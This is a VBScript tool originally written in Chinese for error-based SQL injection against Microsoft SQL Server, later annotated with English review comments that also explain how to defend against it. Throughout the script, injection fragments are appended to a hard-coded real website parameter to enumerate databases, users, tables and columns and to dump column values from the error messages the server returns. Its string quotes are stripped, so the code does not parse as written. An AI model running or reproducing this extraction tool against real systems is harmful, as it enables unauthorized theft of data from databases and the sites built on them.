'sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 by tr4c3[at]126[dot]com '亦适用于mssql 2000的注射,不过2000还是用nbsi和pangolin。
        作者:tr4c3 
'为了保持脚本的通用性,放弃了 and (select col_name(object_id('tablename'),n))=0这样的用法。 
'欲返回韩文等字符可修改121或者136行,更多的设置要自己修改 
'更多功能请大家自己加入
' Top-level driver. The number of command-line arguments selects a mode
' (0 -> usage, 1 -> databases/info, 2 -> tables, 3 -> cols, 4 -> values).
' Each mode loops, sending one probe per iteration through sqlinj and stops
' when sqlinj leaves the script-level variable strd empty (nothing extracted
' from the response).
' NOTE(review): this copy has had its string-literal quotes stripped
' (e.g. `const method = get`, `loop until strd=`), so it does not parse as
' written; the comments below read the evident intent only.
' Defender's view: every request hits one fixed URL parameter with an appended
' SQL fragment (quotename/db_name/sysobjects/syscolumns, a stepping "top N"
' counter, a trailing "--"), and the script depends on the server echoing a
' database error; parameterized queries plus suppressing error text to clients
' close both.
const method = get 'HTTP method, get or post; change here to switch 
const display = d 's = append output to result.txt, d = print to screen
dim strurl_b, strurl, i, k, myarray, strarg, strd 'script-level state; strd is written by sqlinj
strurl_b = http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120' 'template URL with its query string; the author expects this to be edited by hand 
i = 1 'counter for the databases loop 
k = 0 'counter for the tables/cols/values loops 
myarray = split(strurl_b, ?, -1, 1) 'split at '?' (quote stripped in this copy) 
strurl = myarray(0) 'base URL 
strarg = myarray(1) 'query string, prefix for every probe 
set args = wscript.arguments
' no arguments: print usage and exit (showu calls wscript.quit)
if args.count = 0 then 
showu 
end if 
'if args.count =1 and lcase(args(0))
'************************************************************************ 
' mode: list database names / basic info  
'************************************************************************ 
if args.count =1 then 
if lcase(trim(args(0)))=databases then 
resut(---------------===============================--------------) 
resut(all the databases:)
' one request per database ordinal i until sqlinj leaves strd empty
do 
strdata =  and quotename(db_name(&i&))=0-- 
sqlinj(strdata) 
i = i + 1 
loop until strd= 'evidently strd="" - quotes stripped in this copy 
resut(---------------===============================--------------) 
wscript.quit 
elseif lcase(trim(args(0)))= info then 
' single probes: current database, database user, system user
resut(---------------===============================--------------) 
resut(the current database is:) 
strdata =  and quotename(db_name())=0-- 
sqlinj(strdata) 
resut(---------------===============================--------------) 
resut(the database user is:) 
strdata =  and quotename(user)=0-- 
sqlinj(strdata) 
resut(---------------===============================--------------) 
resut(the system_user is:) 
strdata =  and quotename(system_user)=0-- 
sqlinj(strdata) 
resut(---------------===============================--------------) 
wscript.quit 
end if 
end if 
'************************************************************************ 
' mode: list user tables of database args(0)  
'************************************************************************ 
if args.count=2 and lcase(trim(args(1)))=tables then 
resut(---------------===============================--------------) 
resut(the tables of  & args(0)) 
' k-th user table name in <db>.dbo.sysobjects (xtype=char(85), i.e. 'U'); k steps each round
do 
strdata =  and (select top 1 quotename(name) from & args(0) & .dbo.sysobjects where xtype=char(85) and name not in (select top & k & name from &args(0)&.dbo.sysobjects where xtype=char(85)))=0-- 
sqlinj(strdata) 
k = k + 1 
loop until strd= 
resut(---------------===============================--------------) 
wscript.quit 
end if
'************************************************************************ 
' mode: list columns of table args(1) in database args(0)  
'************************************************************************ 
if args.count=3 and lcase(trim(args(2)))=cols then 
database = args(0) 
table = args(1) 
target = database & .dbo. & table 'fully qualified table name 
targetcol = database & .dbo.syscolumns 'column catalog of that database 
resut(---------------===============================--------------) 
resut(the columns of  & target) 
' k-th column name of target from syscolumns; k steps each round
do 
strdata =  and (select top 1 quotename(name) from & targetcol & where id=object_id('& target &') and name not in (select top &k& name from & targetcol & where id=object_id('& target &')))=0-- 
sqlinj(strdata) 
k = k + 1 
loop until strd= 
resut(---------------===============================--------------) 
wscript.quit 
end if
'************************************************************************ 
' mode: list values of column args(2) in args(0).dbo.args(1)  
'************************************************************************ 
if args.count=4 and lcase(trim(args(3)))=values then 
database = args(0) 
table = args(1) 
col = args(2) 
target = database & .dbo. & table  
resut(---------------===============================--------------) 
resut(the values of  & args(2) &  in &target) 
' k-th distinct value of col in target; k steps each round
do 
strdata =  and (select top 1 quotename(& col &) from & target &  where & col & not in (select top & k & & col & from & target &))=0-- 
sqlinj(strdata) 
k = k + 1 
loop until strd= 
resut(---------------===============================--------------) 
wscript.quit 
end if
' Sends one probe and stores whatever the response reveals in the
' script-level variable strd (declared with dim at the top of the script),
' which the callers' loop conditions test for emptiness.
'   value: SQL fragment appended to the template query string (strarg).
' The two branches differ only in transport: GET places the fragment in the
' URL, POST sends it as a form body after urlencode (which handles only
' spaces). In both, the text between the markers '[ and ]' in the response
' body is taken as the result, and an empty strd ends the caller's loop -
' i.e. the script depends on the server echoing a verbose database error;
' not returning error text to clients removes this channel.
' NOTE(review): quotes are stripped in this copy, so in the instr()/mid()
' lines the apostrophe of '[ starts a VBScript comment and the extraction
' logic is not parseable as shown.
sub sqlinj(value) 
if ucase(method) = get then 
value = strarg & value 'full query string: template parameter + fragment 
set objxml = createobject(microsoft.xmlhttp) 
objxml.open get, strurl &? & value , false 'synchronous request 
objxml.setrequestheader referer, strurl 'Referer set to the base URL 
'objxml.setrequestheader accept-language, euc-kr 
objxml.send() 
strrevs = objxml.responsetext 'default: response as text 
'strrevs = bytes2bstr(objxml.responsebody) 'alternative for Korean text: decode the raw body 
if instr(strrevs,'[)0 and instr(strrevs,]')0 then 
strd = mid(strrevs,instr(strrevs,'[)+2, instr(strrevs,]') - instr(strrevs,'[)-2) 
resut( |_&strd) 
else 
strd =  'nothing extracted: evidently strd="" - ends the caller's loop 
end if 
elseif ucase(method) = post then 
value = strarg & value 'full form body: template parameter + fragment 
set objxml = createobject(microsoft.xmlhttp) 
objxml.open post, strurl, false 'synchronous request 
objxml.setrequestheader content-type, application/x-www-form-urlencoded 
objxml.setrequestheader referer, strurl 'Referer set to the base URL 
objxml.send(urlencode(value)) 
strrevs = objxml.responsetext 'default: response as text 
'strrevs = bytes2bstr(objxml.responsebody) 'alternative for Korean text: decode the raw body 
if instr(strrevs,'[)0 and instr(strrevs,]')0 then 
strd = mid(strrevs,instr(strrevs,'[)+2, instr(strrevs,]') - instr(strrevs,'[)-2) 
resut( |_&strd) 
else 
strd =  'nothing extracted: evidently strd="" - ends the caller's loop 
end if 
end if 
end sub
' Writes one output line either to result.txt in the current directory
' (display = s: OpenTextFile mode 8 = ForAppending, create if missing) or to
' the console via wscript.echo (display = d). Any other display value prints
' nothing. Declared as a function but never assigns a return value, so it
' returns Empty; callers ignore it.
'   strinfo: the line to write.
function resut(strinfo) 
if ucase(display) = s then 
set fso = createobject(scripting.filesystemobject) 
set fso1 = fso.opentextfile(result.txt,8,true) 'append, create if missing 
fso1.writeline(strinfo) 
fso1.close 
set fso = nothing 
elseif ucase(display) = d then 
wscript.echo(strinfo) 
end if 
end function
' Minimal form encoding used by the POST branch of sqlinj: replaces spaces
' with '+' and nothing else. This is not a general URL encoder - other
' reserved characters pass through unchanged.
'   str: text to encode; returns the encoded copy.
' (Quotes stripped in this copy: `replace(str, ,+)` evidently replaced " " with "+".)
function urlencode(str) 
str = replace(str, ,+) 
urlencode = str 
end function
' Converts a raw byte array (e.g. an xmlhttp responsebody) to a string:
' a byte becomes one character, except that the else-branch combines the
' byte with the following one into a single double-byte character code
' (thischarcode * &h100 + nextcharcode) and skips that next byte.
'   vin: byte array; returns the decoded string.
' The test on thischarcode is missing its comparison in this copy
' (`if thischarcode strreturn = ...`), so which bytes count as single-byte
' cannot be read from here - presumably a threshold such as < 128; verify
' against the original.
' NOTE(review): `i` is declared at script level (`dim ... i ...`), so this
' loop writes that shared variable rather than a local one; if this function
' were enabled it would disturb the databases loop, which also counts with
' `i`. Its only call sites (in sqlinj) are commented out.
function bytes2bstr(vin) 
strreturn =  'evidently strreturn = "" - quotes stripped in this copy 
for i = 1 to lenb(vin) 
thischarcode = ascb(midb(vin,i,1)) 
if thischarcode strreturn = strreturn & chr(thischarcode) 
else 
nextcharcode = ascb(midb(vin,i+1,1)) 
strreturn = strreturn & chr(clng(thischarcode) * &h100 + cint(nextcharcode)) 
i = i + 1 'consume the second byte of the pair 
end if 
next 
bytes2bstr = strreturn 
end function
' Prints the usage banner to the console and terminates the script host
' (.quit inside the With wscript block). Called from the top level when no
' command-line arguments are given. The echoed strings are runtime output and
' are left as the author wrote them.
sub showu() 
with wscript 
.echo(+--------------------------=====================------------------------------+) 
.echo(sql2005注射辅助脚本(粗糙版),用于mssql显错模式 by tr4c3[at]126[dot]com) 
.echo(usage:) 
.echo( cscript&.scriptname& info--爆基本信息) 
.echo( cscript&.scriptname& databases--爆所有库名) 
.echo( cscript&.scriptname& pubs tables--爆库pubs里所有用户表名) 
.echo( cscript&.scriptname& pubs authors cols--爆库pubs里authors表的所有字段名) 
.echo( cscript&.scriptname& pubs authors au_id values--爆pubs.dbo.authors里au_id的值) 
.echo(+--------------------------=====================------------------------------+) 
.quit 'exits the host; nothing after the call in the caller runs 
end with 
end sub
   
 
   